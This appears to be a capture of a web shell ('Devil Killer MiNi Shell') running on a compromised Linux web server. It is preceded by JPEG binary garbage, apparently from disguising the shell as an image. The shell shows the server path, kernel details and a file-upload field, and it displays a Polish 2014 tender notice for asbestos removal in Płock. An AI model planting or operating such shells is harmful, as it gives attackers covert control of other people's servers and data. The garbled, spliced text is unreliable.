JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140415/127774-N-2014.html

<p class="kh_header"><b>Płock: Usługa w zakresie demontażu, załadunku i transportu do miejsca unieszkodliwiania oraz unieszkodliwienie pokryć dachowych oraz płyt stanowiących osłonę balkonów zawierających azbest z zabudowań indywidualnych (oraz inwentarskich) i wspólnot mieszkaniowych na terenie miasta Płocka</b><br>
<b>Numer ogłoszenia: 127774 - 2014; data zamieszczenia: 15.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Związek Gmin Regionu Płockiego , ul. Zglenickiego 42, 09-411 Płock, woj. mazowieckie, tel. 24 366 03 00, faks 24 366 03 00.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgrp.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.zgrp.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: związek międzygminny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa w zakresie demontażu, załadunku i transportu do miejsca unieszkodliwiania oraz unieszkodliwienie pokryć dachowych oraz płyt stanowiących osłonę balkonów zawierających azbest z zabudowań indywidualnych (oraz inwentarskich) i wspólnot mieszkaniowych na terenie miasta Płocka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia:
W trakcie realizowanych usług Wykonawca będzie spełniał warunki i wymagania określone:
1.	Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 2 kwietnia 2004r. w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz. U. 2004 nr 71 poz. 649),
2.	Rozporządzeniem Ministra Gospodarki i Pracy z dnia 14 października 2005r. w sprawie zasad bezpieczeństwa i higieny pracy przy zabezpieczaniu i usuwaniu wyrobów zawierających azbest oraz programu szkolenia w zakresie bezpiecznego użytkowania takich wyrobów (Dz. U. 2005 nr 216 poz. 1824),
3.	Ustawą z dnia 19 sierpnia 2011 r. o przewozie towarów niebezpiecznych (Dz. U. Nr 227 poz.1367, Nr 244 poz. 1454  ze zmianami.)
4.	Ustawą z dnia 19 sierpnia 2011 r. o przewozie drogowym towarów niebezpiecznych (Dz.U. z 2011 Nr 227, poz. 1367, Nr 244 poz. 1454)
5.	Ustawą o odpadach z dnia 14 grudnia 2012 roku (Dz.U. z 2013 r. nr 0 poz.21 ze zm.)

I.	Przedmiot zamówienia

1.1. Przedmiotem zamówienia jest realizacja usługi w zakresie demontażu, załadunku i transportu do miejsca unieszkodliwiania oraz unieszkodliwienie pokryć dachowych oraz płyt stanowiących osłonę balkonów zawierających azbest z zabudowań indywidualnych (oraz inwentarskich) i wspólnot mieszkaniowych na terenie miasta Płocka, wyrażająca się następującą sekwencją czynności:

1.1.1.	Demontaż pokryć dachowych oraz płyt stanowiących osłonę balkonów zawierających azbest na wskazywanych na bieżąco przez Zamawiającego budynkach zabudowy indywidualnej (oraz inwentarskich) i budynkach należących do wspólnot mieszkaniowych zlokalizowanych na terenie miasta Płocka,
1.1.2.	Załadunek na oznakowane, specjalistyczne środki transportu, 
1.1.3.	Transport zebranych odpadów zawierających azbest do miejsc ich unieszkodliwienia wskazanych przez Wykonawcę. Odbiorcy odpadów wskazani przez Wykonawcę powinni posiadać stosowne zezwolenia na prowadzenie działalności w zakresie  unieszkodliwienia odpadów zawierających azbest i umowę zawartą z Wykonawcą,
1.1.4.	Zdeponowanie na składowisku odpadów przetransportowanych odpadów zawierających azbest,
1.1.5.	Prowadzenie ilościowej i jakościowej ewidencji odpadów określonej w ustawie o odpadach z dnia 14 grudnia 2012 r. (Dz. U. z 2013 r. poz. 21, 888, 1238) z zastosowaniem wzorów dokumentów określonych rozporządzeniem Ministra Środowiska z dnia 8 grudnia 2010 r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz. U. Nr 249  poz. 1673),
1.1.6.	Przekazywanie na żądanie Zamawiającego informacji dotyczących realizowanych usług.
Zamawiający sukcesywnie wskazywać będzie Wykonawcy w czasie trwania umowy budynki, które zostaną objęte w/w usługą.
1.2. Zamawiający przewiduje, iż w czasie realizacji zamówienia ilość odpadów azbestowych pochodzących z demontażu pokryć dachowych oraz płyt stanowiących osłonę balkonów może kształtować się pomiędzy następującymi wielkościami od 620,00 m2 do 5.000,00 m2.
1.3. Zamawiający zastrzega, iż w powyższym postępowaniu nie są usuwane wyroby o gęstości objętościowej mniejszej niż 1000kg/m2 lub inne mocno uszkodzone, a także wyroby zawierające krokidolit,  co Wykonawca przyjmuje do wykonania i akceptuje w ramach wykonywania przedmiotu zamówienia.  
1.4. Cena za wykonywanie przedmiotu niniejszego zamówienia w rozumieniu powyższych zapisów to cena łączna: demontażu, właściwego zabezpieczenia odpadu zawierającego azbest, załadunku właściwego środka transportu i transportu do miejsca unieszkodliwienia oraz koszty unieszkodliwienia 1 metra kwadratowego azbestu z zabudowań indywidualnych (oraz inwentarskich) i wspólnot mieszkaniowych z terenu miasta Płocka oraz wykonania przez Wykonawcę wszelkich czynności z tym związanych określonych jako przedmiot zamówienia.

II. Prawidłowość wykonania przedmiotu zamówienia

2.1. Zamawiający uprawniony jest do bezpośredniej kontroli wykonywania przedmiotu zamówienia przez Wykonawcę i jego pracowników lub podwykonawców.
2.2.  Nieprawidłowości wykonywania przez Wykonawcę przedmiotu zamówienia dokumentowane będą przez Zamawiającego pisemnym protokołem.
2.3. W wypadku stwierdzenia przez Zamawiającego nieprawidłowego wykonywania przedmiotu zamówienia, Zamawiający informuje Wykonawcę pisemnie o zakresie kontroli załączając jednocześnie odpis protokołu kontroli.
2.4. Wykonawca zobowiązany jest pod rygorem rozwiązania umowy z jego winy usunąć nieprawidłowości w wykonywaniu przedmiotu zamówienia w terminie 24 godzin (w dni robocze) od chwili otrzymania zawiadomienia o nieprawidłowym wykonywaniu przedmiotu zamówienia.
2.5. Stwierdzenie przez Zamawiającego jednego przypadku nie wykonywania przedmiotu zamówienia lub nieprawidłowego wykonywania przedmiotu zamówienia uprawnia Zamawiającego do rozwiązania umowy z winy Wykonawcy.

III. Obowiązki stron

3.1. Do obowiązków Wykonawcy należy w szczególności:
3.1.1.	terminowe wykonywanie przedmiotu zamówienia,
3.1.2.	wykonywanie robót zgodnie z obowiązującym Prawem budowlanym, normami oraz sztuką budowlaną oraz przepisami dotyczącymi ochrony środowiska,  
3.1.3. informowanie Zamawiającego o wszystkich sprawach związanych z 
wykonywaniem przedmiotu zamówienia,
3.1.4. dokumentacja fotograficzna z wykonywania przedmiotu zamówienia na każdym etapie wykonywanych robót,
3.1.5. stosowanie się do poleceń Zamawiającego związanych z przedmiotem zamówienia.
3.1.6  udokumentowanie na piśmie uzgodnień z osobą lub instytucją dotyczących: posesji, na której ma być wykonywany przedmiot zamówienia, terminu wykonania demontażu i odbioru odpadów zawierających azbest  (z podaniem daty dziennej i godzinowej), 
3.1.7. uzgodnienie na piśmie z osobą lub instytucją na posesji, na której ma być wykonywany przedmiot zamówienia sposobu zabezpieczenia wykonywania prac oraz ewentualnego zabezpieczenia nieruchomości w wypadku gdyby w trakcie wykonywania prac nastąpiła zmiana warunków atmosferycznych bądź inne nieprzewidziane zdarzenia uniemożliwiające wykonania prac w uzgodnionym terminie. 
3.2. Do obowiązków Zamawiającego należy w szczególności:
3.2.1. potwierdzenie wykonania przedmiotu zamówienia w okresach rozliczeniowych,
3.2.2. terminowe realizowanie płatności w uzgodnionych przez strony terminach..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Szczegółowy opis przedmiotu zamówienia:
W trakcie realizowanych usług Wykonawca będzie spełniał warunki i wymagania określone:
1.	Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 2 kwietnia 2004r. w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz. U. 2004 nr 71 poz. 649),
2.	Rozporządzeniem Ministra Gospodarki i Pracy z dnia 14 października 2005r. w sprawie zasad bezpieczeństwa i higieny pracy przy zabezpieczaniu i usuwaniu wyrobów zawierających azbest oraz programu szkolenia w zakresie bezpiecznego użytkowania takich wyrobów (Dz. U. 2005 nr 216 poz. 1824),
3.	Ustawą z dnia 19 sierpnia 2011 r. o przewozie towarów niebezpiecznych (Dz. U. Nr 227 poz.1367, Nr 244 poz. 1454  ze zmianami.)
4.	Ustawą z dnia 19 sierpnia 2011 r. o przewozie drogowym towarów niebezpiecznych (Dz.U. z 2011 Nr 227, poz. 1367, Nr 244 poz. 1454)
5.	Ustawą o odpadach z dnia 14 grudnia 2012 roku (Dz.U. z 2013 r. nr 0 poz.21 ze zm.)

I.	Przedmiot zamówienia

1.1. Przedmiotem zamówienia jest realizacja usługi w zakresie demontażu, załadunku i transportu do miejsca unieszkodliwiania oraz unieszkodliwienie pokryć dachowych oraz płyt stanowiących osłonę balkonów zawierających azbest z zabudowań indywidualnych (oraz inwentarskich) i wspólnot mieszkaniowych na terenie miasta Płocka, wyrażająca się następującą sekwencją czynności:

1.1.1.	Demontaż pokryć dachowych oraz płyt stanowiących osłonę balkonów zawierających azbest na wskazywanych na bieżąco przez Zamawiającego budynkach zabudowy indywidualnej (oraz inwentarskich) i budynkach należących do wspólnot mieszkaniowych zlokalizowanych na terenie miasta Płocka,
1.1.2.	Załadunek na oznakowane, specjalistyczne środki transportu, 
1.1.3.	Transport zebranych odpadów zawierających azbest do miejsc ich unieszkodliwienia wskazanych przez Wykonawcę. Odbiorcy odpadów wskazani przez Wykonawcę powinni posiadać stosowne zezwolenia na prowadzenie działalności w zakresie  unieszkodliwienia odpadów zawierających azbest i umowę zawartą z Wykonawcą,
1.1.4.	Zdeponowanie na składowisku odpadów przetransportowanych odpadów zawierających azbest,
1.1.5.	Prowadzenie ilościowej i jakościowej ewidencji odpadów określonej w ustawie o odpadach z dnia 14 grudnia 2012 r. (Dz. U. z 2013 r. poz. 21, 888, 1238) z zastosowaniem wzorów dokumentów określonych rozporządzeniem Ministra Środowiska z dnia 8 grudnia 2010 r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz. U. Nr 249  poz. 1673),
1.1.6.	Przekazywanie na żądanie Zamawiającego informacji dotyczących realizowanych usług.
Zamawiający sukcesywnie wskazywać będzie Wykonawcy w czasie trwania umowy budynki, które zostaną objęte w/w usługą.
1.2. Zamawiający przewiduje, iż w czasie realizacji zamówienia ilość odpadów azbestowych pochodzących z demontażu pokryć dachowych oraz płyt stanowiących osłonę balkonów może kształtować się pomiędzy następującymi wielkościami od 620,00 m2 do 2.500,00 m2.
1.3. Zamawiający zastrzega, iż w powyższym postępowaniu nie są usuwane wyroby o gęstości objętościowej mniejszej niż 1000kg/m2 lub inne mocno uszkodzone, a także wyroby zawierające krokidolit,  co Wykonawca przyjmuje do wykonania i akceptuje w ramach wykonywania przedmiotu zamówienia.  
1.4. Cena za wykonywanie przedmiotu niniejszego zamówienia w rozumieniu powyższych zapisów to cena łączna: demontażu, właściwego zabezpieczenia odpadu zawierającego azbest, załadunku właściwego środka transportu i transportu do miejsca unieszkodliwienia oraz koszty unieszkodliwienia 1 metra kwadratowego azbestu z zabudowań indywidualnych (oraz inwentarskich) i wspólnot mieszkaniowych z terenu miasta Płocka oraz wykonania przez Wykonawcę wszelkich czynności z tym związanych określonych jako przedmiot zamówienia.

II. Prawidłowość wykonania przedmiotu zamówienia

2.1. Zamawiający uprawniony jest do bezpośredniej kontroli wykonywania przedmiotu zamówienia przez Wykonawcę i jego pracowników lub podwykonawców.
2.2.  Nieprawidłowości wykonywania przez Wykonawcę przedmiotu zamówienia dokumentowane będą przez Zamawiającego pisemnym protokołem.
2.3. W wypadku stwierdzenia przez Zamawiającego nieprawidłowego wykonywania przedmiotu zamówienia, Zamawiający informuje Wykonawcę pisemnie o zakresie kontroli załączając jednocześnie odpis protokołu kontroli.
2.4. Wykonawca zobowiązany jest pod rygorem rozwiązania umowy z jego winy usunąć nieprawidłowości w wykonywaniu przedmiotu zamówienia w terminie 24 godzin (w dni robocze) od chwili otrzymania zawiadomienia o nieprawidłowym wykonywaniu przedmiotu zamówienia.
2.5. Stwierdzenie przez Zamawiającego jednego przypadku nie wykonywania przedmiotu zamówienia lub nieprawidłowego wykonywania przedmiotu zamówienia uprawnia Zamawiającego do rozwiązania umowy z winy Wykonawcy.

III. Obowiązki stron

3.1. Do obowiązków Wykonawcy należy w szczególności:
3.1.1.	terminowe wykonywanie przedmiotu zamówienia,
3.1.2.	wykonywanie robót zgodnie z obowiązującym Prawem budowlanym, normami oraz sztuką budowlaną oraz przepisami dotyczącymi ochrony środowiska,  
3.1.3. informowanie Zamawiającego o wszystkich sprawach związanych z 
wykonywaniem przedmiotu zamówienia,
3.1.4. dokumentacja fotograficzna z wykonywania przedmiotu zamówienia na każdym etapie wykonywanych robót,
3.1.5. stosowanie się do poleceń Zamawiającego związanych z przedmiotem zamówienia.
3.1.6  udokumentowanie na piśmie uzgodnień z osobą lub instytucją dotyczących: posesji, na której ma być wykonywany przedmiot zamówienia, terminu wykonania demontażu i odbioru odpadów zawierających azbest  (z podaniem daty dziennej i godzinowej), 
3.1.7. uzgodnienie na piśmie z osobą lub instytucją na posesji, na której ma być wykonywany przedmiot zamówienia sposobu zabezpieczenia wykonywania prac oraz ewentualnego zabezpieczenia nieruchomości w wypadku gdyby w trakcie wykonywania prac nastąpiła zmiana warunków atmosferycznych bądź inne nieprzewidziane zdarzenia uniemożliwiające wykonania prac w uzgodnionym terminie. 
3.2. Do obowiązków Zamawiającego należy w szczególności:
3.2.1. potwierdzenie wykonania przedmiotu zamówienia w okresach rozliczeniowych,
3.2.2. terminowe realizowanie płatności w uzgodnionych przez strony terminach.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.65.00.00-8, 45.26.26.60-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy spełniający warunki, o których mowa w art. 22 ust.1 ustawy. Są to następujące warunki:
a.	Posiadanie uprawnień do wykonywania określonej działalności lub czynności w zakresie objętym przedmiotem zamówienia, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesji, zezwolenia lub licencji. Wykonawca spełni ten warunek, jeżeli posiada:
i.	Zezwolenia lub pozwolenia właściwe dla charakteru usługi zlecanej niniejszym zamówieniem, jeżeli przepisy prawa nakładają obowiązek ich posiadania, wydane zgodnie z ustawą o odpadach z 14 grudnia 2012 r. (Dz. U. z 2013r. poz.21, 888, 1238).;
ii.	Zezwolenie na transport odpadów niebezpiecznych, wydany przez właściwy do tego organ administracji publicznej, zgodnie z ustawą o odpadach z dnia 14 grudnia 2012 roku (Dz.U. z 2013 r. nr 0 poz.21 ze zm.)
iii.	umowy z instalacjami, w których będą unieszkodliwione odpady azbestowe;
iv.	dokumenty wymagane ustawą z dnia 19 sierpnia 2011 r. o przewozie drogowym towarów niebezpiecznych (Dz.U. z 2011 Nr 227, poz. 1367, Nr 244 poz. 1454);
v.	inne uprawnienia, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Zamawiający zastrzega sobie prawo sprawdzenia na każdym etapie realizacji usługi lub przed zawarciem umowy z wykonawcą, czy wykonawca ten posiada uprawnienia, o których mowa powyżej, tj. w Rozdziale V SIWZ, ust. 1 pkt a. Jeśli przed podpisaniem umowy okaże się, że wybrany wykonawca nie posiada wymaganych przepisami prawa uprawnień, stanowi to podstawę do uznania, iż wykonawca uchyla się od podpisania umowy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, - co najmniej 1 usługę w zakresie demontażu, załadunku i transportu do miejsca unieszkodliwiania oraz unieszkodliwienia pokryć dachowych oraz płyt stanowiących osłonę balkonów zawierających azbest z zabudowań indywidualnych (oraz inwentarskich) i wspólnot mieszkaniowych, w ilości łącznie co najmniej 5000 (pięciu tysięcy) m kw. (metrów kwadratowych).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony, jeżeli Wykonawca wykaże, że:
i.	posiada dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, w tym uprawnienia budowlane w specjalności konstrukcyjno-budowlanej 
ii.	prace związane z usuwaniem wyrobów zawierających azbest wykonane zostaną zgodnie z rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 2 kwietnia 2004 r. w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz. U.2004 nr 71 poz.649 ze zm)
iii.	zasady bezpieczeństwa i higieny pracy przy zabezpieczaniu i usuwaniu wyrobów zawierających azbest oraz program szkolenia w zakresie bezpiecznego użytkowania takich wyrobów będą zgodne z rozporządzeniem Ministra Gospodarki i Pracy z dnia 14 października 2005r. w sprawie zasad bezpieczeństwa i higieny pracy przy zabezpieczaniu i usuwaniu wyrobów zawierających azbest oraz programu szkolenia w zakresie bezpiecznego użytkowania takich wyrobów
iv.	dysponuje przystosowanymi do zbiórki i transportu odpadów zawierających azbest środkami transportu, które spełniają warunki ustawy ustawą z dnia 19 sierpnia 2011 r. o przewozie drogowym towarów niebezpiecznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony, jeżeli Wykonawca wykaże, że:
i.	posiada dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, w tym uprawnienia budowlane w specjalności konstrukcyjno-budowlanej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony, jeżeli Wykonawca będzie posiadał opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 60.000,00 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

